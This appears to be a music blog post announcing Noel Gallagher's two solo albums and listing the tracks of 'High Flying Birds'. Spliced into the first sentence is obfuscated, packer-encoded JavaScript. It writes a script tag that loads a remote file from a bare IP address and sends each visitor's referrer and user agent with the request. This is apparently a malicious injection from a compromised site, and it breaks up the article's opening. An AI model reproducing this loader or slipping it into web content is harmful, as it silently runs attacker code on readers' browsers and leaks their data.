Noel (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzyef|var|u0026u|referrer|eddnt||js|php’.split(‘|’),0,{}))
Gallagher is has set to release two solo albums, the first of which High Flying Birds will be out on 17th October. LondOnTheInside was present at this morning press conference where Noel announced the first of the two releases. His first solo tour date is 23rd October in Dublin where he will play Oasis songs. The second of the two releases was recorded with Amorphous Androgynous, a.k.a. The Future Sound Of London and is due out in the new year. I wonder if this could see Mr G back to his best before the dreadful Oasis albums came flooding out, if only he released them as his solo work back then…

The tracklisting for ‘Noel Gallagher’s High Flying Birds’ is below:

1. Everybody’s On The Run
2. Dream On
3. If I Had A Gun…
4. The Death Of You And Me
5. (I Wanna Live In A Dream In My) Record Machine
6. AKA… What A Life!
7. Soldier Boys And Jesus Freaks
8. AKA… Broken Arrow
9. (Stranded On) The Wrong Beach
10. Stop The Clocks